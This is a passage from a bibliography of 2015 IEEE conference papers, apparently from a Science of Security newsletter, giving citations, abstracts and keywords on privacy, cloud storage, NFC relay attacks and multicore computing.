Abstract: Usage of cloud systems for data storage has many advantages over the traditional approaches. It is already widely used and its popularity is still fast-growing. The systems must be implemented and maintained in a way that not only satisfies the performance and resource availability requirements, but also fully addresses the questions of security, privacy and data ownership. However, concerns related to those questions very often lead to considerations of a private cloud implementation. In this paper, we explore a private cloud implementation suitable for small to medium businesses. We introduce main types of cloud computing as basic service models and analyze private cloud systems features. Advantages and disadvantages in comparison to public cloud services are considered. Implementation of private cloud solutions in a lab environment allowed us to examine the ease of the setup and maintenance as well as the usability of the chosen solutions and their applicability for the target user group.

Keywords: cloud computing; data privacy ;security of data; small-to-medium enterprises; storage management; synchronisation; cloud computing; data ownership; data storage; private cloud system; public cloud services; small to medium businesses; Cloud computing; Encryption; Organizations; Servers; Synchronization (ID#: 16-9342)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160318&isnumber=7160221

 

Krizan, T.; Brakus, M.; Vukelic, D., "In-Situ Anonymization of Big Data," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 292-298, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160282

Abstract: With organizations storing and even openly publishing their data for further processing, privacy becomes an issue. Such open data should retain its original structure while protecting sensitive personal data. Our aim was to develop fast and secure software for offline anonymization of (distributed) big data. Herein, we describe speed and security requirements for anonymization systems, popular techniques of anonymization and de-anonymization attacks. We give a detailed description of our software for in-situ anonymization of big data distributed in a cluster tested on a real Telco customer data record (CDR) dataset (dataset size is around 500 GB).

Keywords: Big Data; data privacy; security of data; CDR; anonymization attacks; deanonymization attacks; in-situ big data anonymization; offline anonymization; open data; secure software; sensitive personal data; telco customer data record dataset; Big data; Data structures; Distributed databases; Encryption; Organizations; Servers (ID#: 16-9343)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160282&isnumber=7160221

 

Bhattacharya, R.; In-Keun Baek; Jeong Seok Lee; Barik, R.K.; Seontae Kim; Dongpyo Hong; Ohjoon Kwon; Sattorov, M.A.; Yong Hyup Kim; Gun-Sik Park, "Investigation of Emission Capability of Reduced Graphene Oxide Film Cathode for Terahertz Vacuum Electron Devices," in Infrared, Millimeter, and Terahertz waves (IRMMW-THz), 2015 40th International Conference on, pp. 1-2, 23-28 Aug. 2015. doi: 10.1109/IRMMW-THz.2015.7327810

Abstract: Terahertz vacuum sources with high power are in immediate need for several applications like medical, security, communication, etc. The power and performance of these devices mainly depends on cathode. As structure become smaller, it is very much difficult to obtain high power at terahertz frequency, using conventional low current density thermionic cathodes. As a result development of non-conventional field emission cathode is in progress, which may produce a very high current density with comparatively high current and can help in terahertz research and application. In this work our main aim is to develop and analyze high current density (>103A/cm2) sheet beam film cathode using reduced graphene oxide (rGO)-nano particle composite.

Keywords: current density; electron field emission;  graphene; nanocomposites; nanoparticles; submillimetre wave devices; terahertz wave devices; thermionic cathodes; vacuum microelectronics; C; current density analysis; nanoparticle composite; nonconventional field emission cathode; rGO; reduced graphene oxide film cathode; sheet beam film cathode; terahertz vacuum electron device; terahertz vacuum source; thermionic cathode; Cathodes; Current density; Electron devices; Films; Graphene; Microscopy; Thermal stability (ID#: 16-9344)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7327810&isnumber=7327382

 

Seljan, J.; Simunic, D.; Dimic, G.; Vrandecic, B., "Towards a Self-Organizing Network: An Algorithm," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 592-595, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160341

Abstract: In this work we deal with the Achilles' heel of wireless sensor networks - energy efficient operation. By a combined MAC/physical layer attack on the issues contributing to energy overhead, we demonstrate the possibility of reducing the overall power consumption in a relatively straight-forward way without severe alteration of common communication protocols. Results of simulations of networks using the proposed scheme are shown, partially validating the crucial ideas behind it.

Keywords: access protocols; power aware computing; self-organising feature maps telecommunication computing; telecommunication security; wireless sensor networks; MAC-physical layer attack; communication protocols; energy efficient operation; energy overhead; overall power consumption; self-organizing network; wireless sensor networks; Algorithm design and analysis; Monitoring; Power demand; Probabilistic logic; Routing; Standards; Wireless sensor networks (ID#: 16-9345)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160341&isnumber=7160221

 

Vukojevic, S., "Violation of User Privacy by IPTV Packet Sniffing in Home Network," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1338-1343, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160482

Abstract: The aim of this paper is to determine the possibility of learning about and the quantity of collected information about the habits of users of Internet Protocol television (IPTV) in Croatia on the basis of unauthorised monitoring of the IPTV traffic in the users' home network. The experimental part of the presented work includes collecting IPTV traffic in home networks of IPTV users of the two largest electronic communications operators in Croatia while preforming ordinary user activities (initiating the Set Top Box (STB) devices, switching TV channels, using EPG, program recording, using video on demand etc.). The paper does not explore the possibility and the manner of achieving the unauthorised access to the users' home network itself; instead, it is assumed that it has already been obtained. Based on the gathered data, each user's action is analysed from the aspect of indicating users' behavioral habits and the violation of their privacy. The results of the conducted analysis presented in the paper provide an overview of gathered information and some concluding remarks regarding the possibility of violation of privacy by IPTV traffic sniffing in the user's home network.

Keywords: IPTV; computer network security; protocols; telecommunication traffic; Croatia; IPTV packet sniffing; IPTV traffic; IPTV traffic sniffing; IPTV users; Internet protocol television; STB devices; electronic communications operators; program recording; set top box; switching TV channels; unauthorised access; unauthorised monitoring; user home network; user privacy violation; users home network; Home automation; IP networks; IPTV; Protocols; Streaming media; Switches (ID#: 16-9346)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160482&isnumber=7160221

 

Hajdarevic, A.; Dzananovic, I.; Banjanovic-Mehmedovic, L.; Mehmedovic, F., "Anomaly Detection in Thermal Power Plant Using Probabilistic Neural Network," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1118-1123, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160443

Abstract: Anomalies are integral part of every system's behavior and sometimes cannot be avoided. Therefore it is very important to timely detect such anomalies in real-world running power plant system. Artificial neural networks are one of anomaly detection techniques. This paper gives a type of neural network (probabilistic) to solve the problem of anomaly detection in selected sections of thermal power plant. Selected sections are steam superheaters and steam drum. Inputs for neural networks are some of the most important process variables of these sections. It is noteworthy that all of the inputs are observable in the real system installed in thermal power plant, some of which represent normal behavior and some anomalies. In addition to the implementation of this network for anomaly detection, the effect of key parameter change on anomaly detection results is also shown. Results confirm that probabilistic neural network is excellent solution for anomaly detection problem, especially in real-time industrial applications.

Keywords: neural nets; power engineering computing; probability; security of data; thermal power stations; ANN; anomaly detection techniques; artificial neural networks; normal behavior; probabilistic neural network; process variables; real-time industrial applications; steam drum; steam superheaters; thermal power plant; Biological neural networks; Boilers; Power generation; Probabilistic logic; Probability density function; Training (ID#: 16-9347)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160443&isnumber=7160221

 

Cavdar, D.; Tomur, E., "A Practical NFC Relay Attack on Mobile Devices Using Card Emulation Mode," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp.1308-1312, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160477

Abstract: In this study, a practical card-emulated relay attack is implemented on Near Field Communication (NFC) equipped mobile devices. NFC is a promising communication technology which is also used in smart mobile devices. As an effective and flexible communication technology, NFC is frequently used in innovative solutions nowadays such as payments, access control etc. Because of the nature of these transactions, security is a critical issue that should be considered in system design and development phases. Although inherited from Radio Frequency Identification (RFID) technology, NFC security needs, requirements and solutions differ in terms of its usage areas and solutions. Based on these parameters, security precautions in communication layer of RFID technology do not prevent relay attacks occurred in the application layer NFC solutions. This study is conducted to prove relay attack practicability with using only mobile phones for relaying credentials instead of RFID based smart cards in an access control application. The Host Card Emulation (HCE) mode also eases relay attacks in NFC communication. The study explains the conceptual description of proposed relay attack, development and operating logic of mobile applications working based on card emulation mode and server software and also data communication basics between modules and web services descriptions.

Keywords: mobile communication; near-field communication; radiofrequency identification; relay networks (telecommunication); HCE mode; NFC relay attack; NFC security; RFID technology; Web services descriptions; access control application; card emulated relay attack; card emulation mode; communication layer; communication technology; data communication; flexible communication technology; host card emulation; mobile applications; near field communication; radio frequency identification technology; relay attacks; security precautions; server software; smart cards; smart mobile devices; Access control; Emulation; Mobile handsets; Radiofrequency identification; Relays; Smart cards; Card Emulation; Mobile; NFC; Relay Attack (ID#: 16-9348)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160477&isnumber=7160221

 

Dauksevicius, R.; Gaidys, R.; O'Reilly, E.P.; Seifikar, M., "Finite Element Modeling Of ZnO Nanowire with Different Configurations of Electrodes Connected to External Capacitive Circuit for Pressure Sensing Applications," in Thermal, Mechanical and Multi-Physics Simulation and Experiments in Microelectronics and Microsystems (EuroSimE), 2015 16th International Conference on, pp. 1-5, 19-22 April 2015. doi: 10.1109/EuroSimE.2015.7103134

Abstract: This paper reports the results of finite element modeling and analysis of a vertically-aligned ZnO nanowire including surrounding chip components (seed layer, insulating top layer and metal electrodes), taking into account the influence of external capacitance and considering different nanowire morphologies and electrode topographies in order to predict magnitude of electrical outputs as a function of applied dynamic load (compression and/or bending). The length and diameter of the modeled nanowire is in the μm and sub-μm range, respectively and it is intended to function as a single “piezo-pixel” in a matrix of interconnected ZnO nanowires performing dynamic pressure sensing, which could be used for ultraprecise reconstruction of the smallest fingerprint features in highly-reliable security and ID applications.

Keywords: II-VI semiconductors; finite element analysis; nanowires; pressure sensors; zinc compounds; ZnO; applied dynamic load; chip components; dynamic pressure sensing; electrode topographies; external capacitive circuit; finite element modeling; insulating top layer; interconnected nanowires; metal electrodes; nanowire morphologies; pressure sensing applications; seed layer; ultraprecise reconstruction; vertically-aligned nanowire; Electrodes; Surfaces; Zinc oxide (ID#: 16-9349)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7103134&isnumber=7103074

 

Du, Gaoming; Yang, Xin; Chen, Fuzhan; Zhang, Duoli; Song, Yukun; Peng, Chen, "MPCC: Multi-Path Routing Packet Connect Circuit for Network-on-Chip," in Anti-counterfeiting, Security, and Identification (ASID), 2015 IEEE 9th International Conference on, pp. 86-91, 25-27 Sept. 2015. doi: 10.1109/ICASID.2015.7405667

Abstract: Packet Connect Circuit protocol is one of the NoC communication methods. Follow the PCC protocol, the data is transmitted in form of circuit through the route established by packet switching. However, there exists disadvantage in the traditional SPCC (single path Packet Connected Circuit, SPCC) routing algorithm whose rate of channel building will slow down when the chip is congest, resulting in the reduction of the whole communication efficiency directly. To solve this problem, this paper presented MPCC (multi-path Packet Connected Circuit, MPCC) routing algorithm to form a more efficient NoC communication structure which can brilliantly improve the efficiency of data transmission of NoC when it is crowded. The experiment shows that by the method of MPCC, the average packet delay of network decreases by 33.35% compared with S PCC routing algorithm.

Keywords: Algorithm design and analysis; Data communication; Data models; Decoding; Heuristic algorithms; Magnetic heads; Routing; MPCC multi-path routing algorithm; network-on-chip; packet connect circuit (ID#: 16-9350)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7405667&isnumber=7405648

 

Shurman, M.; Al-Mistarihi, M.F.; Alhulayil, M., "Outage Probability of Dual-Hop Amplify-and-Forward Cognitive Relay Networks Under Interference Power Constraints over Nakagami-M Fading Channels," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 516-520, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160326

Abstract: In this paper, the performance of the outage probability (OP) for cognitive dual-hop relay networks with amplify-and-forward (AF) relay under spectrum sharing constraints on primary user (PU) over independent and identically distributed (i.i.d.) Nakagami-m fading channels is investigated. An exact closed-form expression for the OP of the proposed system is derived under the peak interference power (Ip) at the primary user. The impact of the PU location on the OP performance is studied also.

Keywords: Nakagami channels; amplify and forward communication; cognitive radio; probability; radio spectrum management; radiofrequency interference;relay networks (telecommunication);telecommunication network reliability; AF relay; IID Nakagami-m fading channel; OP; dual hop amplify and forward cognitive relay network outage probability; independent and identically distributed Nakagami-m fading channel; interference power constraint; primary user; spectrum sharing constraint; cognitive radio; Fading; Interference; Relay networks (telecommunications); Signal to noise ratio; Wireless networks; Nakagami-m fading; amplify-and-forward relaying; cognitive radio; cognitive relay network; dual hop; outage probability (ID#: 16-9351)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160326&isnumber=7160221

 

Ming, Li; Lijuan, Hong; Tengpeng, Zhang; Huili, Wang, "Efficiency Enhancement in Thin-Film Solar Cells By Silver Nanoparticles," in Optoelectronics and Microelectronics (ICOM), 2015 International Conference on, pp. 327-329, 16-18 July 2015. doi: 10.1109/ICoOM.2015.7398834

Abstract: Surface plasmon enhancement effect of the metallic nanoparticles has the potential to enhance the efficiency of thin film solar cells. In this study, by using a simple method, silver nanoparticle effect was observed on the reflectivity, quantum efficiency and the spectral response of the solar cell. The silver nanoparticles were synthesized by a simple method: magnetron sputtering and subsequent annealing within the sputtering system. The absorption enhancement was observed in the ??? 600???800 nm spectra range. This enhancement can be attributed to photon scattering by the surface plasmon generated in the silver nanoparticles.

keywords: Absorption; Nanoparticles; Photovoltaic cells; Plasmons;Silicon; Silver; Surface morphology; Amorphous silicon; Nanoparticle; Silver; Solar cell; Surface Plasmon (ID#: 16-9352)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7398834&isnumber=7398754

 

Biolek, Dalibor; Biolkova, Viera; Kolka, Zdenek, "Memristor Model for Massively-Parallel Computations," in Computing, Communication and Security (ICCCS), 2015 International Conference on, pp. 1-5, 4-5 Dec. 2015. doi: 10.1109/CCCS.2015.7374183

Abstract: The model of memristor described in the paper is designed for building models of large networks for analog computations. A circuit containing thousands of memristors for finding the shortest path in a complicated maze is a typical example. The model is designed to meet the following criteria: 1. It is a model of HP memristor with linear dopant drift while respecting the physical bounds of the internal state variable. 2. Reliable operation in the SPICE environment also when simulating extremely large networks. 3. Minimization of the simulation time while computing bias points and during transient analyses. A benchmark circuit for testing the applications of various complexities is presented. The results confirm a perfect operation of the model also in applications containing thousands of memristors.

Keywords: Adders; Arrays; Automatic test pattern generation; Built-in self-test; Circuit faults; SPICE; massively-parallel analog computations; memristor; model (ID#: 16-9353)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7374183&isnumber=7374113


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Multicore Computing Security 2015

 

 
SoS Logo

Multicore Computing Security 2015

 

As high performance computing has evolved into larger and faster computing solutions, new approaches to security have been identified. The articles cited here focus on security issues related to multicore environments.  Multicore computing relates to the Science of Security hard topics of scalability, resilience, and metrics.  The work cited here was presented in 2015.


Dupros, F.; Boulahya, F.; Aochi, H.; Thierry, P., "Communication-Avoiding Seismic Numerical Kernels on Multicore Processors," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on ,  pp. 330-335, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.230

Abstract: The finite-difference method is routinely used to simulate seismic wave propagation both in the oil and gas industry and in strong motion analysis in seismology. This numerical method also lies at the heart of a significant fraction of numerical solvers in other fields. In terms of computational efficiency, one of the main difficulties is to deal with the disadvantageous ratio between the limited pointwise computation and the intensive memory access required, leading to a memory-bound situation. Naive sequential implementations offer poor cache-reuse and achieve in general a low fraction of peak performance of the processors. The situation is worst on multicore computing nodes with several levels of memory hierarchy. In this case, each cache miss corresponds to a costly memory access. Additionally, the memory bandwidth available on multicore chips improves slowly regarding the number of computing core which induces a dramatic reduction of the expected parallel performance. In this article, we introduce a cache-efficient algorithm for stencil-based computations using a decomposition along both the space and the time directions. We report a maximum speedup of x3.59 over the standard implementation.

Keywords: cache storage; finite difference methods; gas industry; geophysics computing; multiprocessing systems; petroleum industry; seismic waves; seismology; wave propagation; Naive sequential implementations; cache-efficient algorithm; cache-reuse; communication-avoiding seismic numerical kernel; computational efficiency; finite-difference method; gas industry; memory bandwidth; memory hierarchy; multicore chips; multicore computing nodes; multicore processors; numerical method; numerical solvers; oil industry; peak performance; pointwise computation; seismic wave propagation simulation; seismology; stencil-based computations; strong motion analysis; Memory management; Multicore processing; Optimization; Program processors; Seismic waves; Standards; communication-avoiding; multicore; seismic (ID#: 16-9382)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336184&isnumber=7336120

 

Xiaohao Lin; Weichen Liu; Chunming Xiao; Jie Dai; Xianlu Luo; Dan Zhang; Duo Liu; Kaijie Wu; Qingfeng Zhuge; Sha, E.H.-M., "Realistic Task Parallelization of the H.264 Decoding Algorithm for Multiprocessors," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 871-874, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.33

Abstract: There is a phenomenon that hardware technology has developed ahead of software technology in recent years. Companies lack of software techniques that can fully utilize the modern multi-core computing resources, mainly due to the difficulty of investigating the inherent parallelism inside a software. This problem exists in products ranging from energy-sensitive smartphones to performance-eager data centers. In this paper, we present a case study on the parallelization of the complex industry standard H.264 HDTV decoder application in multi-core systems. An optimal schedule of the tasks is obtained and implemented by a carefully-defined software parallelization framework (SPF). The parallel software framework is proposed together with a set of rules to direct parallel software programming (PSPR). A pre-processing phase based on the rules is applied to the source code to make the SPF applicable. The task-level parallel version of the H.264 decoder is implemented and tested extensively on a workstation running Linux. Significant performance improvement is observed for a set of benchmarks composed of 720p videos. The SPF and the PSPR will together serve as a reference for future parallel software implementations and direct the development of automated tools.

Keywords: Linux; high definition television; multiprocessing systems; parallel programming; source code (software);video coding;H.264 HDTV decoder application;H.264 decoding algorithm; Linux; PSPR; SPF; data centers; energy-sensitive smart phones; multicore computing resources; multiprocessors; optimal task schedule; parallel software implementations; parallel software programming; performance improvement; preprocessing phase; realistic task parallelization; software parallelization framework; source code ;task-level parallel; workstation; Decoding; Industries; Parallel processing; Parallel programming; Software; Software algorithms; Videos (ID#: 16-9383)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336273&isnumber=7336120

 

Cilardo, A.; Flich, J.; Gagliardi, M.; Gavila, R.T., "Customizable Heterogeneous Acceleration for Tomorrow's High-Performance Computing," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1181-1185, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.303

Abstract: High-performance computing as we know it today is experiencing unprecedented changes, encompassing all levels from technology to use cases. This paper explores the adoption of customizable, deeply heterogeneous manycore systems for future QoS-sensitive and power-efficient high-performance computing. At the heart of the proposed architecture is a NoC-based manycore system embracing medium-end CPUs, GPU-like processors, and reconfigurable hardware regions. The paper discusses the high-level design principles inspiring this innovative architecture as well as the key role that heterogeneous acceleration, ranging from multicore processors and GPUs down to FPGAs, might play for tomorrow's high-performance computing.

Keywords: field programmable gate arrays; graphics processing units; multiprocessing systems; network-on-chip; parallel processing; power aware computing; quality of service; FPGA; GPU-like processors; NoC-based many-core system; QoS-sensitive computing; customizable heterogeneous acceleration; heterogeneous acceleration; heterogeneous manycore systems; high-level design principles; high-performance computing; innovative architecture; medium-end CPU; multicore processors; power-efficient high-performance computing; reconfigurable hardware regions; Acceleration; Computer architecture; Field programmable gate arrays; Hardware; Program processors; Quality of service; Registers (ID#: 16-9384)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336329&isnumber=7336120 

 

Haidar, A.; YarKhan, A.; Chongxiao Cao; Luszczek, P.; Tomov, S.; Dongarra, J., "Flexible Linear Algebra Development and Scheduling with Cholesky Factorization," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 861-864, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.285

Abstract: Modern high performance computing environments are composed of networks of compute nodes that often contain a variety of heterogeneous compute resources, such as multicore CPUs and GPUs. One challenge faced by domain scientists is how to efficiently use all these distributed, heterogeneous resources. In order to use the GPUs effectively, the workload parallelism needs to be much greater than the parallelism for a multicore-CPU. Additionally, effectively using distributed memory nodes brings out another level of complexity where the workload must be carefully partitioned over the nodes. In this work we are using a lightweight runtime environment to handle many of the complexities in such distributed, heterogeneous systems. The runtime environment uses task-superscalar concepts to enable the developer to write serial code while providing parallel execution. The task-programming model allows the developer to write resource-specialization code, so that each resource gets the appropriate sized workload-grain. Our task-programming abstraction enables the developer to write a single algorithm that will execute efficiently across the distributed heterogeneous machine. We demonstrate the effectiveness of our approach with performance results for dense linear algebra applications, specifically the Cholesky factorization.

Keywords: distributed memory systems; graphics processing units; mathematics computing; matrix decomposition; parallel processing; resource allocation; scheduling; Cholesky factorization; GPU; compute nodes; distributed heterogeneous machine; distributed memory nodes; distributed resources; flexible linear algebra development; flexible linear algebra scheduling; heterogeneous compute resources; high performance computing environments; multicore-CPU; parallel execution; resource-specialization code; serial code; task-programming abstraction; task-programming model; task-superscalar concept; workload parallelism; Graphics processing units; Hardware; Linear algebra; Multicore processing; Parallel processing; Runtime; Scalability; Cholesky factorization; accelerator-based distributed memory computers; heterogeneous HPC computing; superscalar dataflow scheduling (ID#: 16-9385)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336271&isnumber=7336120

 

Qiuming Luo; Feng Xiao; Yuanyuan Zhou; Zhong Ming, "Performance Profiling of VMs on NUMA Multicore Platform by Inspecting the Uncore Data Flow," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 914-917, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.47

Abstract: Recently, NUMA(Non-Uniform Memory Access) multicore platform becomes more and more popular which provides hardware level support for many hot fields, such as cloud computing and big data, and deploying virtual machines on NUMA is a key technology. However, performance degradation in virtual machine isn't negligible due to the fact that guest OS has little or inaccurate knowledge about the underlying hardware. Our research will focus on performance profiling of VMs on multicore platform by inspecting the uncore data flow, and we design a performance profiling tool called VMMprof based on PMU(Performance Monitoring Units). It supports the uncore part of the processor, which is a new function beyond the capabilities of those existing tools. Experiments show that VMMprof can obtain typical factors which affect the performance of the processes and the whole system.

Keywords: data flow computing; memory architecture; multiprocessing systems; performance evaluation; virtual machines; NUMA multicore platform; PMU; VM performance profiling; VMMprof; hardware level support; nonuniform memory access; performance degradation; performance monitoring units; performance profiling tool; uncore data flow; uncore data flow inspection; virtual machines; Bandwidth; Hardware; Monitoring; Multicore processing; Phasor measurement units; Sockets; Virtual machining; NUMA; PMU; VMMprof; VMs; uncore (ID#: 16-9386)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336283&isnumber=7336120

 

Jiachen Xue; Chong Chen; Lin Ma; Teng Su; Chen Tian; Wenqin Zheng; Ziang Hu, "Task-D: A Task Based Programming Framework for Distributed System," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1663-1668, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.299

Abstract: We present Task-D, a task-based distributed programming framework. Traditionally, programming for distributed programs requires using either low-level MPI or high-level pattern based models such as Hadoop/Spark. Task based models are frequently and well used for multicore and heterogeneous environment rather than distributed. Our Task-D tries to bridge this gap by creating a higher-level abstraction than MPI, while providing more flexibility than Hadoop/Spark for task-based distributed programming. The Task-D framework alleviates programmers from considering the complexities involved in distributed programming. We provide a set of APIs that can be directly embedded into user code to enable the program to run in a distributed fashion across heterogeneous computing nodes. We also explore the design space and necessary features the runtime should support, including data communication among tasks, data sharing among programs, resource management, memory transfers, job scheduling, automatic workload balancing and fault tolerance, etc. A prototype system is realized as one implementation of Task-D. A distributed ALS algorithm is implemented using the Task-D APIs, and achieved significant performance gains compared to Spark based implementation. We conclude that task-based models can be well suitable to distributed programming. Our Task-D is not only able to improve the programmability for distributed environment, but also able to leverage the performance with effective runtime support.

Keywords: application program interfaces; message passing; parallel programming; automatic workload balancing; data communication; distributed ALS algorithm; distributed programming; distributed system; heterogeneous computing node; high-level pattern based; job scheduling; low-level MPI; resource management; task-D API; task-based programming framework; Algorithm design and analysis; Data communication; Fault tolerance; Fault tolerant systems; Programming; Resource management; Synchronization (ID#: 16-9387)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336408&isnumber=7336120

 

Beard, J.C.; Chamberlain, R.D., "Run Time Approximation of Non-blocking Service Rates for Streaming Systems," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 792-797, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.64

Abstract: Stream processing is a compute paradigm that promises safe and efficient parallelism. Its realization requires optimization of multiple parameters such as kernel placement and communications. Most techniques to optimize streaming systems use queueing network models or network flow models, which often require estimates of the execution rate of each compute kernel. This is known as the non-blocking "service rate" of the kernel within the queueing literature. Current approaches to divining service rates are static. To maintain a tuned application during execution (while online) with non-static workloads, dynamic instrumentation of service rate is highly desirable. Our approach enables online service rate monitoring for streaming applications under most conditions, obviating the need to rely on steady state predictions for what are likely non-steady state phenomena. This work describes an algorithm to approximate non-blocking service rate, its implementation in the open source RaftLib framework, and validates the methodology using streaming applications on multi-core hardware.

Keywords: data flow computing; multiprocessing systems; public domain software; compute kernel execution rate; dynamic instrumentation; kernel communications; kernel placement; multicore hardware; multiple parameter optimization; nonblocking service rate approximation; nonstatic workloads; nonsteady state phenomena; online service rate monitoring; open source RaftLib framework; parallelism; run-time approximation; service rate; steady state predictions; stream processing; streaming system optimization; streaming systems; Approximation methods; Computational modeling; Instruments; Kernel; Monitoring; Servers; Timing; instrumentation; parallel processing; raftlib; stream processing (ID#: 16-9388)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336255&isnumber=7336120

 

Bogdan, P.; Yuankun Xue, "Mathematical Models and Control Algorithms for Dynamic Optimization of Multicore Platforms: A Complex Dynamics Approach," in Computer-Aided Design (ICCAD), 2015 IEEE/ACM International Conference on, pp. 170-175, 2-6 Nov. 2015. doi: 10.1109/ICCAD.2015.7372566

Abstract: The continuous increase in integration densities contributed to a shift from Dennard's scaling to a parallelization era of multi-/many-core chips. However, for multicores to rapidly percolate the application domain from consumer multimedia to high-end functionality (e.g., security, healthcare, big data), power/energy and thermal efficiency challenges must be addressed. Increased power densities can raise on-chip temperatures, which in turn decrease chip reliability and performance, and increase cooling costs. For a dependable multicore system, dynamic optimization (power / thermal management) has to rely on accurate yet low complexity workload models. Towards this end, we present a class of mathematical models that generalize prior approaches and capture their time dependence and long-range memory with minimum complexity. This modeling framework serves as the basis for defining new efficient control and prediction algorithms for hierarchical dynamic power management of future data-centers-on-a-chip.

Keywords: multiprocessing systems; power aware computing; temperature; Dennard scaling; chip performance; chip reliability; complex dynamics approach; control algorithm; data-centers-on-a-chip; dynamic optimization; hierarchical dynamic power management; many-core chips; multicore chips; multicore platform; on-chip temperature; power density; power management; prediction algorithm; thermal management; Autoregressive processes; Heuristic algorithms; Mathematical model; Measurement; Multicore processing; Optimization; Stochastic processes (ID#: 16-9389)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7372566&isnumber=7372533

 

Mohamed, A.S.S.; El-Moursy, A.A.; Fahmy, H.A.H., "Real-Time Memory Controller for Embedded Multi-core System," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 839-842, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.133

Abstract: Nowadays modern chip multi-cores (CMPs) become more demanding because of their high performance especially in real-time embedded systems. On the other side, bounded latencies has become vital to guarantee high performance and fairness for applications running on CMPs cores. We propose a new memory controller that prioritizes and assigns defined quotas for cores within unified epoch (MCES). Our approach works on variety of generations of double data rate DRAM(DDR DRAM). MCES is able to achieve an overall performance reached 35% for 4 cores system.

Keywords: DRAM chips; embedded systems; multiprocessing systems; CMP cores; DDR-DRAM; MCES; bounded latencies; chip multicores; double-data-rate DRAM generation; embedded multicore system; real-time embedded systems; real-time memory controller; unified epoch; Arrays; Interference; Multicore processing; Random access memory; Real-time systems; Scheduling; Time factors; CMPs; Memory Controller; Real-Time (ID#: 16-9390)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336266&isnumber=7336120

 

